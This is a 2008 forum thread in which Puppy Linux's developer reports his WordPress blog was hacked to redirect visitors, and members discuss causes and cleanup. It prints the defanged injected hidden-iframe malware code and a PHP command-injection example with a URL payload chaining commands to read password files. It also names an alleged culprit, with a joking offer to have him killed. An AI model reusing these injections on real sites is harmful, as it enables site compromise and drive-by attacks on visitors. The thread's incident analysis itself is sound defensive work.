Puppy Linux Discussion Forum Forum Index Puppy Linux Discussion Forum
Puppy HOME page : puppylinux.com
"THE" alternative forum : puppylinux.info
 
 FAQFAQ   SearchSearch   MemberlistMemberlist   UsergroupsUsergroups   RegisterRegister 
 ProfileProfile   Log in to check your private messagesLog in to check your private messages   Log inLog in 

The time now is Thu 31 Jul 2014, 07:34
All times are UTC - 4
 Forum index » Taking the Puppy out for a walk » Announcements
Serious security breach on Developer Blog
Moderators: Flash, Ian, JohnMurga
Post new topic   Reply to topic View previous topic :: View next topic
Page 1 of 9 [121 Posts]   Goto page: 1, 2, 3, ..., 7, 8, 9 Next
Author Message
BarryK
Puppy Master


Joined: 09 May 2005
Posts: 7047
Location: Perth, Western Australia

PostPosted: Sat 12 Jan 2008, 18:38    Post subject:  Serious security breach on Developer Blog  

I went to my blog this morning and got redirected to another site. My PC became very busy, mouse response extremely slow. I managed to kill SeaMonkey.

I FTP'd to my site and found that two files, blog/index.php and blog/wp-blog-header.php have been modified. I have restored the originals.

The big question is, how could someone do that?

I have raised a ticket with servage and asked them that question.

Note, I've turned off comments on my blog, but there were no suspicious comments anyway.

_________________
http://bkhome.org/news/
Back to top
View user's profile Send private message Visit poster's website 
veronicathecow


Joined: 21 Oct 2006
Posts: 533

PostPosted: Sat 12 Jan 2008, 18:50    Post subject:  

Hi Barry sorry to hear of this problem. My first thought is "Any chance" that your machine has been compromised" Secondly was, perhaps it's time to see if there is need to tighten up Puppy security? (It may have been on the server from their side but it looks as though it was making a good stab at taking over your PC.)
Perhaps now things like the Asus eeePC are getting sold in volume and firfox is becoming more powerful that the forces of darkness will be taking an interest a deeper interest in opensource
Cheers
Tony
Back to top
View user's profile Send private message 
John Doe

Joined: 01 Aug 2005
Posts: 1689
Location: Michigan, US

PostPosted: Sat 12 Jan 2008, 19:00    Post subject:  

I just PM'd this to Barry, before I noticed the thread here.

You're all welcome to read it.

Regarding the page change:

Wordpress 2.3 Cross Domain Content Insertion- New vulnerability + exploit - xssworm.com
http://seclists.org/fulldisclosure/2007/Nov/0336.html

Regarding the one comment that go through the other day I had signed up to post what follows this link. In the mean time I did some further research and found it was probably SQL injection.

Wordpress 2.3.1 Charset SQL Injection Vulnerability
http://blogsecurity.net/wordpress/wordpress-231-charset-sql-injection-vulnerability/

---

Your security implementation is probably adequate. There are three methods which could be used to create such spam that came to mind when I read your post.

1-an exploit in the WordPress code to bypass the security layers. If you examine your http logs for the request that created the comment it might tell you if this was the method used. Also it would allow you to notify the WordPress creators so they could fix the problem. You could gather, at a minimum, the page that was used to implement the exploit. If a 'get' post was used, you might be able to further identify the query string which would help the coders diagnose the problem faster.

2-a server level database permission issue that allowed another user or site on the same server to insert an entry directly to your database. This would be impractical for spammers, as they would have to pay for accounts on lots of servers and hope a majority or the admins had a weak understanding of security.

3-an sql injection vulnerability in the registration form, the login form or the search form. the login form and search form queries shouldn't use a user that has insert permissions anyway, so maybe the registration form. this would depend on what permissions to which tables the user account that it queried as were given. if that user doesn't have permission to insert to the comment table in the database, it's not this.
Back to top
View user's profile Send private message 
MU


Joined: 24 Aug 2005
Posts: 13642
Location: Karlsruhe, Germany

PostPosted: Sat 12 Jan 2008, 21:10    Post subject:  

I had a comparable problem not long ago.
Using gftp I could see, that the problem came from a newsletter-module of I think PHPBB.
It seems that a weak point was taken to install a spam-mailer.
You could see it by analyzing how the folders around it got infected by new PHP-Scripts.

One concrete example:

if you have such code:
thecommand = $GET["whatnext"];
system($thecommand);

So you would call a website like this:
http://xyt.com/index.php?whatnext=ls

Then the string "ls" would be passed to index.php
It then is executed by "system".
Now the attack would be to pass your own string, like:
http://xyt.com/index.php?whatnext=ls;cd;cd ..;cd ..;cd etc;cat passwords

You might have to replace some chars with HTML-entities like %20 instead of spaces.
This is a very obvious vulnerability, there are more advanced as said by John Doe.

And software IS buggy.
We had the example of a commercial boardsystem, where you registered as new user with restrictions, and then until you did not log in to your account, had access to all boards, even those that are usually just allowed to be viewed by administrators.

Mark
Back to top
View user's profile Send private message Visit poster's website 
BarryK
Puppy Master


Joined: 09 May 2005
Posts: 7047
Location: Perth, Western Australia

PostPosted: Sat 12 Jan 2008, 22:28    Post subject:  

Looking around my site with gFTP, I quickly discovered that my entire site had been hacked.

This covers goosee.com as well as puppylinux.com, each in it's own subdirectory.

I contacted servage, they replied that I should change my password, and make sure that all directories are 755, and all files 644.

So, I went through, making sure all permissions are okay, uploading the original files when I found a hacked one. But, the thing is, static html pages in 755 directory with 644 permission were also hacked.

I did have a lot of html files with 755, and I did notice a preference by the hacker to hack those. But it doesn't explain how 644 files got hacked. I've sent a message to servage asking how that could happen.

Right now, I'm nervously watching my site to see if anything more happens to it.

There seem to be two different types of hack, one that occurred on Jan 10th, which has injected porno links into some pages. Then the one that I found, a massive hack of my site on Jan 12th, which has inserted redirection code. I'll put the site that I got redirected to, but don't go there!!! Maybe someone can work out what this site does or attempts to do. This is my hacked blog/index.php, but I have inserted some capitalisation to disable it:

Code:
<?php
/* Short and sweet */
define('WP_USE_THEMES', true);
require('./wp-blog-headerDOTphp');
?><iframe src="httpCOLON//orentraffDOTcn/tdsbear/indexDOTphp?out=1199657524" width="0" height="0" style="display:none"></iframe>

_________________
http://bkhome.org/news/
Back to top
View user's profile Send private message Visit poster's website 
wingruntled

Joined: 20 Feb 2007
Posts: 287
Location: Great Lakes

PostPosted: Sat 12 Jan 2008, 23:08    Post subject:  

Barry
Not to sound like an idiot, but. This is old news.
You were hacked last year but never got the message.
http://murga-linux.com/puppy/viewtopic.php?t=23724
Back to top
View user's profile Send private message 
John Doe

Joined: 01 Aug 2005
Posts: 1689
Location: Michigan, US

PostPosted: Sun 13 Jan 2008, 00:29    Post subject:  

I got the name of who is responsible already.

Mahmod AbdAllah el Gashmi

He lives in Turkey. Just say the word Barry and I'll have him killed. Cool

He's mentioned on this page:
http://spamtrackers.eu/wiki/index.php?title=Hijacked_host

I'll post how I figured that out in a bit. I have to go get my nightly brew.
Back to top
View user's profile Send private message 
Caneri

Joined: 04 Sep 2007
Posts: 1580
Location: Canada

PostPosted: Sun 13 Jan 2008, 01:11    Post subject:  

Well..it looks like puppylinux.ca is also down.

My IP address will not resolve to my domain.

My tech guys are working on this problem but may be until tomorrow before I get an answer.

Sorry all.

Eric

_________________
Be not afraid to grow slowly, only be afraid of standing still.
Chinese Proverb

Back to top
View user's profile Send private message 
John Doe

Joined: 01 Aug 2005
Posts: 1689
Location: Michigan, US

PostPosted: Sun 13 Jan 2008, 01:33    Post subject:  

Ok, I used wget to request the url Barry posted without using the query string and got a simple file that looks like a login form (it's attached as index.php.txt).

Then I used wget to request the url with the query string and got the following pertinent information (the whole dialog is attached as wget-response.txt):

HTTP request sent, awaiting response... 302 Found
Location: httpCOLON//88.255.94.114/~usersonli/oren/indexDOTphp [following]
Connecting to 88.255.94.114:80... failed: Bad file descriptor.

Using the ip address I looked up the owner via whois.ripe.net. It's that guy I mentioned above (info in whois.ripe.net.txt).

The most interesting part was "Bad file descriptor", that's why your browser froze up. I'm assuming it's some sort of exploit for IE that installs his root kit, which is mentioned at the following post:
http://www.bluetack.co.uk/forums/index.php?showtopic=18139&pid=85109&st=0&#entry85109

What a piece of trash. Evil or Very Mad
files.tar
Description  Text Files are in the TarBall
tar

 Download 
Filename  files.tar 
Filesize  8 KB 
Downloaded  922 Time(s) 
Back to top
View user's profile Send private message 
Caneri

Joined: 04 Sep 2007
Posts: 1580
Location: Canada

PostPosted: Sun 13 Jan 2008, 01:54    Post subject:  

I'm not sure if this is related or not.

http://www.internetnews.com/security/article.php/3712071

Eric

_________________
Be not afraid to grow slowly, only be afraid of standing still.
Chinese Proverb

Back to top
View user's profile Send private message 
John Doe

Joined: 01 Aug 2005
Posts: 1689
Location: Michigan, US

PostPosted: Sun 13 Jan 2008, 02:10    Post subject:  

Caneri wrote:
I'm not sure if this is related or not.


it's all related somehow Smile

cool read, thanks for the link (hopefully it wasn't one of them Exclamation )
Back to top
View user's profile Send private message 
BarryK
Puppy Master


Joined: 09 May 2005
Posts: 7047
Location: Perth, Western Australia

PostPosted: Sun 13 Jan 2008, 02:51    Post subject:  

Okay, if it's an exploit for IE, then likely not targetting Linux and wouldn't have compromised my PC...

Anyway, I think I know how my site was violated. Well, not really 'how', just the basic outline.

My site has had two violations, one dated Jan 10, the second on Jan 12. Well, you might have seen my recent blog post "The spam that got through" - that was Jan 10. Then, last night - Jan 12 - there was another one. That's two of them, corresponding with my site violations.

So, my confidence in WordPress has hit rock bottom. Even if I do upgrade, it seems to be a never ending battle. I've turned off comments - and 'flagman' posted a comment immediately after! Globally turning off comments only affects new posts! Yikes, I hunted through the prefs and there's nothing to globally turn off comments!!!

So, I used the "bad words" filter to block everything - how crude.

_________________
http://bkhome.org/news/
Back to top
View user's profile Send private message Visit poster's website 
Previously known as Guest


Joined: 28 Sep 2005
Posts: 240

PostPosted: Sun 13 Jan 2008, 04:33    Post subject:  

As I've had an ongoing issue with servage & pkagfiles, one of their "fixes" was to move the account to another datacenter & change ALL permissions (directory & file) to 777! Not the brightest bunch it seems.

I've had problems with permissions in the past! 403 errors for no reason.

Also it seems they outsource their tech support to India. I will look further into it & probably relocate pkagfiles to another host.

pkagfiles is currently working, but am watching closely for issues that may arise & will adjust, take offline if needed.

Sorry for any inconveniences.

Ron AKA PkaG.
Back to top
View user's profile Send private message 
Lobster
Official Crustacean


Joined: 04 May 2005
Posts: 15117
Location: Paradox Realm

PostPosted: Sun 13 Jan 2008, 04:46    Post subject:  

Sad

I have a Wordpress blog (rarely post to it)
Had to turn off the comments due to corrective medication for penile dysfunction and porn spam
http://tmxxine.com/wordpress/

corrective medication for penile dysfunction = via***
I can not use the word via*** as Johns efforts to fight the mal merchants changes the word to "poisonous crap"

Look how hard John and Flash work to stop spam
(and it still gets through . . . )

It makes sense for spammers to code bots for popular services
and Wordpress is the top blogging tool.
http://www.honeynet.org/papers/bots/botnet-code.html

We have the word "Puppy" come up with Puppy Linux in Google
Therefore owning that or hijacking it is a commercial decision.

An attack is inconvenient, annoying and also can make one paranoid
(as if it is a personal attack) Confused

It is important to maintain ones psychological perspective
when this sort of situation occurs
(I am occasionally sane enough to recognise that) Shocked

So far the solution seems right:

    1. Exposing and dealing with the situation
    2. Notifying and working with the software and server providers


When the Puppy wiki was attacked with spam bots
rather than change to new software
Raffy hardened the existing software
and even though users have to register
many did and some regular users are making
many useful contributions Smile

Related to spam is the use of gmail to filter
(not ideal but no solution is)

Just remember there is a protective cordon of expertise
around Puppy. How this situation is dealt with is indicative
of a growing maturity. Do we stay in place and fight our corner
or run to a new solution
(with attendant problems)?

Good luck. Cool

_________________
Puppy WIKI

Last edited by Lobster on Tue 05 Feb 2008, 00:45; edited 1 time in total
Back to top
View user's profile Send private message Visit poster's website 
Previously known as Guest


Joined: 28 Sep 2005
Posts: 240

PostPosted: Sun 13 Jan 2008, 05:48    Post subject:  

Previously known as Guest wrote:
As I've had an ongoing issue with servage & pkagfiles, one of their "fixes" was to move the account to another datacenter & change ALL permissions (directory & file) to 777! Not the brightest bunch it seems.

I've had problems with permissions in the past! 403 errors for no reason.

Also it seems they outsource their tech support to India. I will look further into it & probably relocate pkagfiles to another host.

pkagfiles is currently working, but am watching closely for issues that may arise & will adjust, take offline if needed.

Sorry for any inconveniences.

Ron AKA PkaG.


Interestingly within a few minutes of this post an attack started from:
84.221.65.76 [host-84-221-65-76.cust-adsl.tiscali.it]
80.186.120.215 [a80-186-120-215.elisa-laajakaista.fi]

Maybe I'll start posting fscking IP's involved again! I could write a novel of IP addresses. Shocked
Back to top
View user's profile Send private message 
Display posts from previous:   Sort by:   
Page 1 of 9 [121 Posts]   Goto page: 1, 2, 3, ..., 7, 8, 9 Next
Post new topic   Reply to topic View previous topic :: View next topic
 Forum index » Taking the Puppy out for a walk » Announcements
Jump to:  

You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You cannot attach files in this forum
You can download files in this forum


Powered by phpBB © 2001, 2005 phpBB Group
[ Time: 0.0974s ][ Queries: 13 (0.0060s) ][ GZIP on ]